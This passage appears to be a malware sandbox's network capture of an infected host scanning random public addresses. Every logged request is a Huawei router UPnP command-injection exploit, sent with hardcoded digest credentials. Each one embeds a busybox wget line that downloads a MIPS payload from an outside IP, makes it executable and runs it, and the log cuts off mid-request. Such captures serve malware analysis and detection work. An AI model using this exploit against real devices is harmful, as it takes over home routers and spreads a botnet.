6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  518192.168.2.134240041.190.57.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.315720081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  519192.168.2.135955841.1.87.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.315749884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  520192.168.2.133285241.45.9.12537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.315785885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  521192.168.2.135874041.180.46.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.315810919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  522192.168.2.1356476131.121.12.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.315854073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  523192.168.2.134413490.215.158.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.315879107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  524192.168.2.1349208197.250.44.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.315906048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  525192.168.2.1348532197.127.134.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.316042900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  526192.168.2.133402441.98.26.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.316083908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  527192.168.2.1334848157.236.251.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.316122055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  528192.168.2.135417013.92.154.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.316139936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
